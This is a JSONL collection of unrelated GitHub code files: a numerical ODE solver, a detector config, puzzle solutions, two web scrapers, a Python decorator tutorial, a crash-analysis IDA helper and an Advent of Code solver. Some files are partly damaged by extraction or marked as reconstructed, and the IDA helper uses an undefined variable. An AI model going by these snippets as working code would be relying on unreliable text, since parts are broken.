+{"seq_id":"72473388990","text":"import numpy as np\nfrom electron import RME \nfrom gen_var import I \nimport frigg_it_logic as fil\n\ndef rkf(x,y,h,func,BT,BTS,xr,xl):\n # min and max time step\n hmin = 1e-5\n hmax = 5e-1\n h_arr = []\n br_no = 10\n \"\"\"# min and max errors\n if y > 10000.0/(RME*M_fac): #1e-8 and 1e-4 works\n err_min = 1e-8\n err_max = 1e-5\n elif y > 1000.0/(RME*M_fac): # 1e-10 and 1e-6 works\n err_min = 1e-10\n err_max = 1e-7\n else: # 1e-13 and 1e-8 works\n err_min = 1e-12\n err_max = 1e-8\"\"\"\n\n err_min = 1e-8\n err_max = 1e-5\n # max number of iterations\n N = int((xr - xl)/hmin)\n N = 100 # hard cap, overrides the estimate above\n #if x+h > xr:\n # h = xr-x\n if x - np.abs(h) < xl:\n h = x - xl \n #calculate the k's \n for i in range(N):\n h = np.abs(h)\n k1 = func(x,y)\n k2 = func(x + BT[1,0]*h, y - h*(k1*BT[1,1])) # should be + not - but need to account for negative dr \n k3 = func(x + BT[2,0]*h, y - h*(k1*BT[2,1] + k2*BT[2,2]))\n k4 = func(x + BT[3,0]*h, y - h*(k1*BT[3,1] + k2*BT[3,2] + k3*BT[3,3]))\n k5 = func(x + BT[4,0]*h, y - h*(k1*BT[4,1] + k2*BT[4,2] + k3*BT[4,3] + k4*BT[4,4]))\n k6 = func(x + BT[5,0]*h, y - h*(k1*BT[5,1] + k2*BT[5,2] + k3*BT[5,3] + k4*BT[5,4] + k5*BT[5,5]))\n\n #calculate fourth and fifth order solutions \n y4 = y - h*(BTS[0,0]*k1 + BTS[0,2]*k3 + BTS[0,3]*k4 + BTS[0,4]*k5)\n y5 = y - h*(BTS[1,0]*k1 + BTS[1,2]*k3 + BTS[1,3]*k4 + BTS[1,4]*k5 + BTS[1,5]*k6)\n\n y_norm = np.max(np.asarray([y4,y5])) # asarray takes one sequence; a second positional argument would be read as a dtype\n err = np.abs(y4/y_norm-y5/y_norm) # need to remove y norms if this doesn't work\n\n if err < err_min and y4 > 0.0 and y5 > 0.0:\n # if error small, enlarge h, but match final simulation time\n h = min(2.*np.abs(h),hmax) \n if x - h < xl:\n h = xl - x\n break\n elif err > err_max or y4 < 0.0 or y5 < 0.0:\n # if error big or energy is less than critical value, reduce h\n h = max(np.abs(h/2.),hmin)\n else:\n # error is ok, take this h and y5\n break\n h_arr.append(h)\n if i%br_no ==0 and i>0:\n test, h_test = fil.frigg_it_logic(h_arr, br_no)\n if test == 'true':\n h = h_test\n y4 = y - h*(BTS[0,0]*k1 + BTS[0,2]*k3 + BTS[0,3]*k4 + BTS[0,4]*k5)\n y5 = y - h*(BTS[1,0]*k1 + BTS[1,2]*k3 + BTS[1,3]*k4 + BTS[1,4]*k5 + BTS[1,5]*k6)\n err = np.abs(y4-y5)\n print(\"'Frigg it' logic used\")\n break\n else:\n pass\n if i==N-1:\n print(\"max number of iterations reached, check parameters\")\n k = [k1,k2,k3,k4,k5,k6]\n return x - np.abs(h), y5, h
, err, k\n","repo_name":"fkmart/Pellet-Ablation","sub_path":"rkf45_euler.py","file_name":"rkf45_euler.py","file_ext":"py","file_size_in_byte":2797,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"60"}
+{"seq_id":"36234487244","text":"class detectorConfig:\n min_size = 800\n max_size = 1000\n image_mean = [0.485, 0.456, 0.406]\n image_std = [0.229, 0.224, 0.225]\n\n # anchor parameters\n anchor_size = [64, 128, 256]\n anchor_ratio = [0.5, 1, 2.0]\n\n # roi align parameters\n roi_out_size = [7, 7]\n roi_sample_rate = 2\n\n # rpn process parameters\n rpn_pre_nms_top_n_train = 2000\n rpn_post_nms_top_n_train = 2000\n\n rpn_pre_nms_top_n_test = 1000\n rpn_post_nms_top_n_test = 1000\n\n rpn_nms_thresh = 0.7\n rpn_fg_iou_thresh = 0.7\n rpn_bg_iou_thresh = 0.3\n rpn_batch_size_per_image = 256\n rpn_positive_fraction = 0.5\n\n # remove low threshold target\n box_score_thresh = 0.015\n box_nms_thresh = 0.5\n box_detections_per_img = 100\n box_fg_iou_thresh = 0.5\n box_bg_iou_thresh = 0.5\n box_batch_size_per_image = 512\n box_positive_fraction = 0.25\n bbox_reg_weights = None\n","repo_name":"PushparajaMurugan/RCNN_Infinite_Batches","sub_path":"Detector_RCNN_configuration.py","file_name":"Detector_RCNN_configuration.py","file_ext":"py","file_size_in_byte":901,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"60"}
+{"seq_id":"32580213545","text":"#!/bin/python3\n\nimport math\nimport os\nimport random\nimport re\nimport sys\n\n\ndef appendAndDeleteMine(s, t, k):\n # print(s, t, k)\n N = 'No'\n Y = 'Yes'\n r = N\n isSHasStr = True\n tIndex = 0\n lT = len(t) + len(s)\n if lT <= k:\n r = Y\n elif s == t:\n r = Y\n else:\n i=0\n while i < len(s) and i < len(t) and s[i] == t[i]:\n i += 1\n # NOTE: the remainder of this first attempt was destroyed during text\n # extraction (angle-bracketed spans were stripped); the loop condition\n # above is a best-guess reconstruction and the helper just returns r.\n return r\n\n\ndef appendAndDelete(s, t, k):\n i = 0\n # reconstructed: walk past the common prefix of s and t (the original\n # comparison was eaten by the extractor together with other <...> spans)\n while i < len(s) and i < len(t) and s[i] == t[i]:\n i += 1\n if len(s) + len(t) - 2*i > k:\n return \"No\"\n elif (len(s) + len(t) - 2*i)%2 == k%2:\n return \"Yes\"\n elif len(s) + len(t) -k <0 :\n return \"Yes\"\n else:\n return \"No\"\n\n\nif __name__ == '__main__':\n fptr = open(os.environ['OUTPUT_PATH'], 'w')\n # fptr = open(\".m.txt\", 'w')\n\n s = input()\n\n t = input()\n\n k = int(input().strip())\n\n result = appendAndDelete(s, t, k)\n # print(result)\n fptr.write(result + '\\n')\n\n fptr.close()\n","repo_name":"asraful009/problem-solve","sub_path":"hackerrank_problem/appendAndDelete/appendAndDelete.py","file_name":"appendAndDelete.py","file_ext":"py","file_size_in_byte":1059,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"60"}
+{"seq_id":"15270413246","text":"import requests\nfrom bs4 import BeautifulSoup\nimport json\n\n\nurl = 'https://travel.rakuten.co.jp/HOTEL/27813/27813_std.html'\nreq = requests.get(url)\nsoup = BeautifulSoup(req.content,'html.parser')\n\nhotel_title = soup.find('a',{'class': 'rtconds fn'})\nhotel_title = hotel_title.text\n\nimgs = soup.find_all('ul',{'class':'std-photo-video-thumbnail'})\nimgs = imgs[0].find_all('img')\nimgs_l = []\n# c = 1\nfor i in imgs:\n img_url = i.get('src')\n imgs_l.append(img_url)\nc = 1\n# def generate_img_slider(imgs_l,c):\ndivs_l = []\nfor i in range(len(imgs_l)):\n img_div = ('''
    \"Banner\"\n

    [[HOLE 1 PAR4 Regular309Y HDCP17]]

    \n
    ''' %(str(c),imgs_l[i]))\n divs_l.append(img_div)\n c+=1\n # print(img_div)\n\n # return divs_l\n\ninfo_titles = soup.find_all('h2',{'class':'dtlTblTtl'})\ninfo_titles_l = []\nfor i in info_titles:\n info_titles_l.append(i.text)\n\ninfo_titles_l = info_titles_l[1:]\n# print(info_titles_l)\n\nbasic_info = soup.find_all('ul',{'class':'dtlTbl'})\nd_basic_info_l = []\nfor i in basic_info:\n d_basic_info_l.append(i.text)\n\n# Basic information section formatting\n\ni1 = d_basic_info_l[0]\ni1 = i1.split('\\n\\n\\n\\n')\ni1_l =[]\n\nfor j in i1:\n j = j.split('\\n')\n i1_l.append(j)\n\nfor i in range(len(i1_l)):\n temp =[]\n for j in i1_l[i]:\n if j != '':\n temp.append(j) \n i1_l[i] = temp\n \nfor i in range(len(i1_l)):\n i1_l[i] = (' '.join(i1_l[i]))\n\n\nfor i in range(len(i1_l)):\n i1_l[i] = i1_l[i].split(' ')\n\nd_basic_info={}\nfor i in i1_l:\n if len(i)>1:\n d_basic_info[i[0]] = i[1:]\nfor i in d_basic_info:\n info_div = ('''
    <!-- info-row markup reconstructed; the original tags were stripped in extraction and only two string placeholders survived -->\n    <div class=\"info-title\">\n    %s\n    </div>\n    <div class=\"info-body\">\n    %s\n    </div>
    ''' %(i , ' '.join(d_basic_info[i])))\n # print(info_div)\n# need to put i2 at 976\n\n\n# 2nd info table scraping\n\ni2 = d_basic_info_l[1]\ni2_l = i2.split('\\n\\n\\n\\n\\n')\nfor i in range(len(i2_l)):\n i2_l[i] = i2_l[i].split('\\n')\n temp =[]\n for j in i2_l[i]:\n if j != '':\n temp.append(j)\n i2_l[i] = temp\n\ni2_l = [i for i in i2_l if len(i) != 0] # filter instead of remove() while iterating, which skips items\nd_i2 = {}\nfor i in i2_l:\n d_i2[i[0]] = i[1:]\nfor i in d_i2:\n d_i2[i] = ' '.join(d_i2[i])\n\n\nfor i in d_i2:\n info_div_1 = ('''
    <!-- info-row markup for the second table, reconstructed the same way; original tags were stripped in extraction -->\n    <div class=\"info-title\">\n    %s\n    </div>\n    <div class=\"info-body\">\n    %s\n    </div>
    ''' %(i , d_i2[i])) # d_i2[i] was already joined to a single string above; join()-ing it again would space out its characters\n print(info_div_1)\n\nprint()\n\n\n\n# slider = ('''\n#
    (commented-out image-slider experiment: the HTML markup of this template was stripped during text extraction; only stray fragments survived -- bullet controls, an image with alt text \"Banner\" and the caption \"[[HOLE 1 PAR4 Regular309Y HDCP17]]\" -- so the body is collapsed to this placeholder)\n#
    ''' %(hotel_title,url ))\n\n\n","repo_name":"yashschaudhari01/Rakuten-Scrapper","sub_path":"hotel_detail/test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":6742,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"60"}
+{"seq_id":"16434317066","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Fri Dec 24 14:16:54 2021\n\n@author: Fuzz4\n\"\"\"\nimport torch\nimport numpy as np\nfrom ..core.module import Module\n\ndef split_data(n_p, n_f, dim_u, datasets):\n dynamic = n_p + n_f\n train_X, train_L, test_X, test_L = datasets\n dim_dy = train_X.shape[1]\n dim_z = int( dim_dy / dynamic )\n train_U, train_Y, test_U, test_Y = [], [], [], []\n for t in range(dynamic):\n u_start, u_end = int(t*dim_z), int(t*dim_z+dim_u)\n y_start, y_end = int(t*dim_z+dim_u), int((t+1)*dim_z)\n train_U.append(train_X[:,u_start: u_end])\n train_Y.append(train_X[:,y_start: y_end])\n test_U.append(test_X[:,u_start: u_end])\n test_Y.append(test_X[:,y_start: y_end])\n train_U, train_Y, test_U, test_Y = np.concatenate(train_U, 1), np.concatenate(train_Y, 1),\\\n np.concatenate(test_U, 1), np.concatenate(test_Y, 1)\n print(train_U.shape, train_Y.shape, test_U.shape, test_Y.shape)\n print(train_L.shape, test_L.shape)\n train_X, test_X = np.concatenate([train_U, train_Y], 1), np.concatenate([test_U, test_Y], 1)\n # split_point = dim_u * dynamic + dim_y * n_p\n # input = X[:, :split_point], label = X[:, split_point:]\n return train_X, train_L, test_X, test_L\n\nclass SupDynamic(Module):\n def __init__(self, **kwargs):\n default = {'dim_u': None, # dimension of u before stacking\n 'dim_y': None, # dimension of y before stacking\n 'n_p': None, # number of stacked past steps used to predict x(k)\n 'n_f': None, # used to predict the next n_f outputs y_f(k)\n 'struct': []\n }\n \n for key in default.keys():\n if key not in kwargs:\n kwargs[key] = default[key]\n \n kwargs['split_p'] = int(kwargs['dim_u']*(kwargs['n_p'] + kwargs['n_f']) +\\\n kwargs['dim_y'] * kwargs['n_p'])\n kwargs['struct'][0] = kwargs['split_p']\n \n self._name = 'SupDynamic'\n Module.__init__(self, **kwargs)\n self.FCNN = self.Sequential()\n self.opt()\n \n def forward(self, dy_x):\n inputs, labels = dy_x[:,:self.split_p], dy_x[:,self.split_p:]\n pred_ys = self.FCNN(inputs)\n self.loss = self.L(pred_ys, labels)\n return labels - pred_ys","repo_name":"zhuofupan/Pytorch-Deep-Neural-Networks","sub_path":"fuzz/model/supdy.py","file_name":"supdy.py","file_ext":"py","file_size_in_byte":2389,"program_lang":"python","lang":"en","doc_type":"code","stars":113,"dataset":"github-code","pt":"60"}
+{"seq_id":"12762136196","text":"# What a decorator does: add behavior before and after a function without changing how the function is called;\r\n# A decorator is, in essence, a closure\r\n\r\n### Example 1:\r\n# def wrapper(func):\r\n# def inner(*args, **kwargs): ## inner((7,)) receives a tuple\r\n# print('things done before the decorated function runs')\r\n# ret = func(*args, **kwargs) ## holiday(*(3,),**{}) -- the call unpacks the tuple\r\n# print('things done after the decorated function runs')\r\n# return ret\r\n#\r\n# return inner\r\n#\r\n#\r\n# @wrapper # equivalent to holiday = wrapper(holiday)\r\n# def holiday(day):\r\n# print(\"Everyone gets %s days off\" % day)\r\n# return \"so happy\"\r\n#\r\n# print(holiday.__name__) ## prints 'inner', so in this case the function's attributes were changed\r\n# a = holiday(7) ## equivalent to inner(7)\r\n# print(a)\r\n\r\n## Example 2: [use functools.wraps to preserve the function's attributes]\r\nfrom functools import wraps ## import the wraps helper\r\ndef wrapper(func):\r\n @wraps(func)\r\n def inner(*args, **kwargs): ## inner((7,)) receives a tuple\r\n print('things done before the decorated function runs')\r\n ret = func(*args, **kwargs) ## holiday(*(3,),**{}) -- the call unpacks the tuple\r\n print('things done after the decorated function runs')\r\n return ret\r\n\r\n return inner\r\n\r\n\r\n@wrapper\r\ndef holiday(day):\r\n print(\"Everyone gets %s days off\" % day)\r\n return \"so happy\"\r\n\r\nprint(holiday.__name__)
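# Illustrative sketch: the same decorator written WITHOUT functools.wraps\r\n# loses the original function's metadata (names below are only for this demo):\r\ndef plain_wrapper(func):\r\n    def inner(*args, **kwargs):\r\n        return func(*args, **kwargs)\r\n    return inner\r\n\r\n@plain_wrapper\r\ndef demo(day):\r\n    return day\r\n\r\nprint(demo.__name__)  ## -> 'inner': the wrapper replaced demo's metadata\r\n\r\n# The @wraps version above, in contrast: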
## still prints 'holiday': the attributes are preserved, so we truly only extend the function's behavior without changing it\r\na = holiday(7) ## equivalent to inner(7)\r\nprint(a)\r\n\r\n\r\n'''\r\nExplanation:\r\n(1) Calling a function without a decorator:\r\n pass arguments\r\n caller <---------> function\r\n return value\r\n\r\n(2) Calling a function with a decorator:\r\n pass arguments\r\n caller <---------> decorator <---------> function\r\n return value\r\n'''\r\n\r\n\r\n## print a function's __name__ attribute\r\n# def wahaha():\r\n# '''\r\n# function of wahaha;\r\n# :return:\r\n# '''\r\n# print('wahaha')\r\n#\r\n# print(wahaha.__name__) ## print the function's __name__ attribute\r\n# print(wahaha.__doc__) ## print the function's docstring\n","repo_name":"xincuter/myops","sub_path":"python/老男孩python教程第9期/day12/06_装饰器精讲.py","file_name":"06_装饰器精讲.py","file_ext":"py","file_size_in_byte":2145,"program_lang":"python","lang":"zh","doc_type":"code","stars":3,"dataset":"github-code","pt":"60"}
+{"seq_id":"10334908844","text":"import sklearn.datasets\nimport sklearn.ensemble\nimport sklearn.linear_model\nfrom sklearn.metrics import f1_score\nfrom sklearn.model_selection import train_test_split\n\nfrom baikal import Input, Model, make_step\nfrom baikal.plot import plot_model\nfrom baikal.steps import Concatenate\n\n\n# ------- Define steps\nLogisticRegression = make_step(sklearn.linear_model.LogisticRegression)\nRandomForestClassifier = make_step(sklearn.ensemble.RandomForestClassifier)\nExtraTreesClassifier = make_step(sklearn.ensemble.ExtraTreesClassifier)\n\n# ------- Load dataset\ndata = sklearn.datasets.load_breast_cancer()\nX, y_p = data.data, data.target\nX_train, X_test, y_train, y_test = train_test_split(\n X, y_p, test_size=0.2, random_state=0\n)\n\n# ------- Build model\nx = Input()\ny_t = Input()\ny_p1 = LogisticRegression(function=\"predict_proba\")(x, y_t)\ny_p2 = RandomForestClassifier(function=\"predict_proba\")(x, y_t)\nensemble_features = Concatenate()([y_p1, y_p2])\ny_p = ExtraTreesClassifier()(ensemble_features, y_t)\n\nmodel = Model(x, y_p, y_t)\nplot_model(model, filename=\"stacked_classifiers.png\", dpi=96)\n\n# ------- Train model\nmodel.fit(X_train, y_train)\n\n# ------- Evaluate model\ny_train_pred = model.predict(X_train)\ny_test_pred = model.predict(X_test)\n\nprint(\"F1 score on train data:\", f1_score(y_train, y_train_pred))\nprint(\"F1 score on test data:\", f1_score(y_test, y_test_pred))\n","repo_name":"seeker1943/baikal","sub_path":"examples/stacked_classifiers.py","file_name":"stacked_classifiers.py","file_ext":"py","file_size_in_byte":1370,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"60"}
+{"seq_id":"41278923104","text":"def get_ida_taint_overlay(entrypoint, trace, taint_graph, file):\n import json\n\n # Find all addresses that are not sources of another address.\n # These should be highlighted as the beginning of the taint\n # Or end of reverse taint.\n #
However you want to look at it.\n addr_seen = {}\n for idx, sources in taint_graph._path.items():\n addr = trace._trace[idx]\n addr_seen[addr] = False\n for src in sources:\n addr_seen[src[0]] = True\n\n out_map = {\n \"entrypoint\": entrypoint,\n \"comments\": [],\n }\n for addr, src in path.items():\n comment = \", \".join([f\"0x{x[0]:x}|{x[1]}\" for x in src])\n comment_struct = {\n \"address\": addr,\n \"thread_id\": \"main\",\n \"text\": f\" <- {comment}\",\n }\n if src[0][1] == \"user_taint\":\n comment_struct[\"color\"] = 0xE16563\n if not addr_seen[addr]:\n comment_struct[\"color\"] = 0x81CD4E\n\n # green\n\n out_map[\"comments\"].append(comment_struct)\n\n r = json.dumps(out_map)\n loaded_r = json.loads(r)\n file.write(\"DISAS\\n\" + json.dumps(loaded_r, indent=4, sort_keys=True))","repo_name":"zeropointdynamics/zelos-crashd","sub_path":"src/crashd/taint/render/ida.py","file_name":"ida.py","file_ext":"py","file_size_in_byte":1158,"program_lang":"python","lang":"en","doc_type":"code","stars":10,"dataset":"github-code","pt":"60"} +{"seq_id":"11442432791","text":"from src.presentation.controllers.contatos.delete_contato_controller import DeleteContatoController\nfrom src.infra.tests.contato_repository import ContatosRepositorySpy\nfrom src.presentation.http_types.http_response import HttpResponse\n\n\nclass HttpResquetMock:\n def __init__(self):\n self.body = {\"id_\": 22}\n\n\n\ndef test_handle():\n htt_request_mock = HttpResquetMock()\n use_case = ContatosRepositorySpy()\n controller = DeleteContatoController(use_case)\n\n response = controller.handle(htt_request_mock)\n\n assert isinstance(response, HttpResponse)\n","repo_name":"felypecoliveira/CleanArch","sub_path":"src/presentation/controllers/contatos/delete_contato_controller_test.py","file_name":"delete_contato_controller_test.py","file_ext":"py","file_size_in_byte":569,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"51"} +{"seq_id":"42262144771","text":"from models.spatial_bicycle_model import SpatialBicycleModel\nimport matplotlib.pyplot as plt\nimport numpy as np\nimport pytest\n\nimport math\n\n\n@pytest.mark.parametrize('vehicle, result', [\n ({'x': 0, 'y': 0, 'theta': math.pi/2}, {'e_y': 0, 'e_psi': 0}),\n ({'x': 1, 'y': 0, 'theta': math.pi/2}, {'e_y': -1, 'e_psi': 0}),\n ({'x': -1, 'y': 0, 'theta': math.pi/2}, {'e_y': 1, 'e_psi': 0}),\n ({'x': 100, 'y': 0, 'theta': 0}, {'e_y': -100, 'e_psi': -math.pi/2}),\n ({'x': -100, 'y': 0, 'theta': math.pi}, {'e_y': 100, 'e_psi': math.pi/2})\n])\ndef test_vehicle_in_path(path_array, vehicle, result, plot):\n vehicle_pose = np.array([vehicle['x'], vehicle['y'], vehicle['theta']])\n\n spatial_bicycle_model = SpatialBicycleModel()\n\n state = spatial_bicycle_model.get_state(vehicle_pose, path_array)\n\n assert state[0] == result['e_y']\n assert state[1] == result['e_psi']\n\n if plot:\n plt.plot(path_array[:, 0], path_array[:, 1])\n plt.plot(vehicle_pose[0], vehicle_pose[1], 'go')\n\n plt.axhline(0, color='black', alpha=0.1)\n plt.axvline(0, color='black', alpha=0.1)\n plt.show()\n","repo_name":"Javiercerna/navigation-python","sub_path":"tests/test_models.py","file_name":"test_models.py","file_ext":"py","file_size_in_byte":1126,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"51"} +{"seq_id":"12316852140","text":"import keyboard\nfrom time import sleep\nfrom vision import Locator\nimport numpy as np\n# import matplotlib.pyplot as plt\n\n\nlocator = Locator()\n\ndef wait_keyboard():\n 
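    \"\"\"Wait for the 't' key, take one location fix, print it, then recurse to wait again.\"\"\"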
print(\"Press t to test LiDAR...\")\n keyboard.wait(\"t\")\n print(\"\\bGrabbing location...\")\n \n try:\n locator.locate()\n locator.print_location()\n except RuntimeError as e:\n print(e)\n \n sleep(0.1)\n wait_keyboard()\n\ndef run_tests(num):\n NUM_TESTS = 1\n results_x = []\n results_y = []\n results_a = []\n for i in range(NUM_TESTS):\n print(f\"{i+1}/{NUM_TESTS}\")\n try:\n locator.locate()\n # locator.print_location()\n results_x.append(locator.x)\n results_y.append(locator.y)\n results_a.append(locator.angle)\n except RuntimeError as e:\n print(e)\n \n # t = [(i+1) for i in range(num)]\n print(f\"x_std: {np.std(results_x)} ({results_x[-1]})\")\n print(f\"y_std: {np.std(results_y)} ({results_y[-1]})\")\n print(f\"a_std: {np.std(results_a)}\")\n # plt.plot(t, results_x, 'r--', t, results_y, 'bs')\n #plt.ylabel(\"Distance (mm)\")\n # plt.show()\n","repo_name":"SpaceHawks/robot2021","sub_path":"robot/vision_test.py","file_name":"vision_test.py","file_ext":"py","file_size_in_byte":1150,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"51"} +{"seq_id":"33892892913","text":"import requests\nfrom bs4 import BeautifulSoup\nimport lxml\nimport pandas\n\nUNI = requests.get(\"https://stackoverflow.com/questions/tagged/beautifulsoup\")\n\nquest = BeautifulSoup(UNI.text, 'lxml')\nres = quest.find_all('h3', class_='s-post-summary--content-title')\nvotes = quest.find_all('div', class_='s-post-summary--stats-item s-post-summary--stats-item__emphasized')\nanswers = quest.find_all('div', class_='s-post-summary--stats-item has-answers')\nchildrenQ = []\nchildrenV = []\nchildrenA = []\n\nfor i in range(10):\n question = res[i].findChildren(\"a\", recursive=False)\n vote = votes[i].findChildren('span', class_='s-post-summary--stats-item-number')\n answer = answers[i].findChildren('span', class_='s-post-summary--stats-item-number')\n childrenQ.append(question[0].getText())\n childrenV.append(vote[0].getText())\n childrenA.append(answer[0].getText())\n\ndata = {\n \"titre\": childrenQ,\n \"votes\": childrenV,\n \"answers\": childrenA\n}\ndf = pandas.DataFrame(data, columns=[\"titre\", \"votes\", \"answers\"])\n\ndf.to_csv(\"data.csv\", index=0)","repo_name":"Mildor/td4","sub_path":"td4exo3.py","file_name":"td4exo3.py","file_ext":"py","file_size_in_byte":1053,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"51"} +{"seq_id":"29035038051","text":"# [BOJ] 2869. 
The Snail Wants to Climb Up\n\n# A: distance climbed during the day / # B: distance slid down at night / V: height of the wooden pole\nA, B, V = map(int, input().split())\n\n#---------------------\n# Code that timed out -> it repeats a while loop until day is found;\n# day has to be computed directly instead\n# day = 0\n# go = 0\n# while True:\n# day += 1\n# go += A\n# if go >= V:\n# print(day)\n# break\n# go -= B\n#-------------------------\n# A * day - B * (day-1) >= V\n# day >= (V-B)/(A-B), e.g. A=2, B=1, V=5 -> day = ceil(4/1) = 4\nday = (V-B) / (A-B) # number of days needed to climb the whole pole\nif day == int(day):\n print(int(day))\nelse:\n print(int(day) + 1)\n","repo_name":"yyyrin/Algorithm","sub_path":"BOJ/Bronze/2869.py","file_name":"2869.py","file_ext":"py","file_size_in_byte":683,"program_lang":"python","lang":"ko","doc_type":"code","stars":1,"dataset":"github-code","pt":"51"}
+{"seq_id":"35912698318","text":"# num=int(input(\"Enter num: \"))\n# if num>0: # nested if: one if comes inside another if -- runs when the outer condition is true\n# if num>5:\n# print(num)\n# else:\n# print('in else')\n# else:\n# print('Out')\n\nnum=int(input(\"Enter num: \"))\nif num>0 and num>5: # or we can use if with a logical operator\n print(num)\nelse:\n print('in else')\n\n","repo_name":"Shilpa-Pavithran/Python-Works","sub_path":"Flow_of_Control/Decision_Making/nestedif.py","file_name":"nestedif.py","file_ext":"py","file_size_in_byte":366,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"51"}
+{"seq_id":"23302745014","text":"list_db = list()\n\n\ndef get_db() -> list:\n global list_db\n return list_db\n\n\ndef set_db(db: list) -> None:\n global list_db\n list_db = db[:]\n\n\ndef open_db(path: str) -> list:\n open_dbl = list()\n my_phonebook = '' # was `my_phonebook = str`, which assigned the type itself\n try:\n with open(path, 'r', encoding='UTF-8') as file:\n my_phonebook = file.read()\n except:\n return []\n my_phonebook = [[word for word in strn.strip().split(';')] for strn in my_phonebook.split('\\n')]\n for i, d in enumerate(my_phonebook):\n if len(d) == 4:\n db = dict()\n db['Фамилия'] = d[0]\n db['Имя'] = d[1]\n db['Номер телефона'] = d[2]\n db['Тип номера'] = d[3]\n open_dbl.append(db)\n return open_dbl\n\n\ndef close_db(path: str) -> int:\n list_dbl = get_db()\n if len(list_dbl) == 0:\n return 0\n else:\n my_phonebook = ''\n for i, d in enumerate(list_dbl):\n strn = ''\n for value in d.values():\n strn += value + ';'\n strn = strn[:-1] + '\\n'\n my_phonebook += strn\n try:\n with open(path, 'w', encoding='UTF-8') as file:\n file.write(my_phonebook[:-1])\n except:\n return 2\n list_dbl = list()\n set_db(list_dbl)\n return 1\n\n\ndef add_new_contact(lst: list) -> None:\n if len(lst) == 4:\n dbl = get_db()\n db = dict()\n db['Фамилия'] = lst[0]\n db['Имя'] = lst[1]\n db['Номер телефона'] = lst[2]\n db['Тип номера'] = lst[3]\n dbl.append(db)\n set_db(dbl)\n\n\ndef compare_two_listcontact(old: list, new: list) -> int:\n if len(old) != len(new):\n return 0\n for i in range(len(old)):\n listoldkeys = [j for j in old[i].keys()]\n listnewkeys = [j for j in new[i].keys()]\n listoldvalues = [j for j in old[i].values()]\n listnewvalues = [j for j in new[i].values()]\n if len(listoldkeys) != len(listnewkeys) != len(listoldvalues) != len(listnewvalues):\n return 0\n for k in range(len(listoldkeys)):\n if listoldkeys[k] != listnewkeys[k]:\n return 0\n if listoldvalues[k] != listnewvalues[k]:\n return 0\n return 1 # all contacts matched; the original returned 1 after comparing only the first key\n\n\n","repo_name":"sharganow/Meeting-Python-Seminar7","sub_path":"model.py","file_name":"model.py","file_ext":"py","file_size_in_byte":2469,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"51"}
+{"seq_id":"40922274559","text":"import multiprocessing as mp\nimport re\nfrom functools import partial\nfrom typing import TypeAlias\n\nfrom timing_util import Timing\n\nCoord: TypeAlias = tuple[int, int]\n\n\ndef get_data(content: str) -> list[tuple[Coord, Coord]]:\n data = [\n tuple(\n map(int,\n re.search(r'Sensor at x=(-?\\d+), y=(-?\\d+): closest beacon is at x=(-?\\d+), y=(-?\\d+)', line).groups()))\n for line in content.splitlines()\n ]\n return [((l[0], l[1]), (l[2], l[3])) for l in data]\n\n\ndef dist(a: Coord, b: Coord) -> int:\n return sum(abs(i - j) for i, j in zip(a, b))\n\n\ndef deltoids(data: list[tuple[Coord, Coord]]) -> list[tuple[int, int, int]]:\n deltoids = []\n for s, b in data:\n d = dist(s, b)\n deltoids.append((s[1] - d, s[1] + d, s[0]))\n\n return deltoids\n\n\ndef ranges(delts: list[tuple[int, int, int]], target_y: int) -> list[tuple[int, int]]:\n # [start, end] in target_y\n ranges = []\n for (dl, dr, x) in delts:\n if dl <= target_y <= dr:\n span = min(target_y - dl, dr - target_y)\n ranges.append((x - span, x + span))\n\n return ranges\n\n\ndef part1(data: list[tuple[Coord, Coord]], target_y: int) -> int:\n\n def simplify_ranges(ranges: list[tuple[int, int]]) -> list[tuple[int, int]]:\n # sorting ranges by start\n r = sorted(ranges)\n start, end = r[0]\n rngs = []\n for s, e in r[1:]:\n # ranges are assumed to simplify down to a single one for part1\n if (start <= s <= end <= e) or (end + 1 == s):\n end = e\n elif not (start <= s and e <= end):\n rngs.append((start, end))\n start, end = s, e\n\n if not rngs or rngs[-1] != (start, end):\n rngs.append((start, end))\n\n return rngs\n\n sensors = set([s for s, _ in data])\n beacons = set([b for _, b in data])\n\n # max/min y coordinate for each sensors range\n delts = deltoids(data)\n rngs = ranges(delts, target_y)\n\n r = simplify_ranges(rngs)\n # sum of range\n n = sum(max_ - min_ + 1 for min_, max_ in r)\n\n # subtracting 'S's\n for sx, sy in sensors:\n if sy == target_y:\n for min_, max_ in r:\n if min_ <= sx <= max_:\n n -= 1\n\n # subtracting 'B's\n for bx, by in beacons:\n if by == target_y:\n for min_, max_ in r:\n if min_ <= bx <= max_:\n n -= 1\n\n return n\n\n\ndef find_part2_parallel(target_y, delts):\n # sorting ranges by start\n r = sorted(ranges(delts, target_y))\n a1, a2 = r[0]\n for b1, b2 in r[1:]:\n if (a1 <= b1 <= a2 <= b2) or (a2 + 1 == b1):\n a2 = b2\n elif not (a1 <= b1 and b2 <= a2):\n # assuming there's only a single free space, the NEXT x-coordinate has to be it\n # so we take the lower range's max and +1 to it\n return (a2 + 1) * 4000000 + target_y\n\n\ndef part2(data: list[tuple[Coord, Coord]], min_y: int, max_y: int) -> int:\n # max/min y coordinate for each sensors range\n delts = deltoids(data)\n\n func = partial(find_part2_parallel, delts=delts)\n with mp.Pool(processes=int(mp.cpu_count() * (2/3))) as pool:\n result = pool.map(func, range(min_y, max_y + 1))\n\n r = list(filter(bool, result))\n assert len(r) == 1\n return r[0]\n\n\nif __name__ == '__main__':\n with Timing():\n with open('15/input.txt') as in_file:\n data = get_data(in_file.read())\n\n print(f'part1: {part1(data, 2_000_000)}')\n print(f'part2: {part2(data, 0, 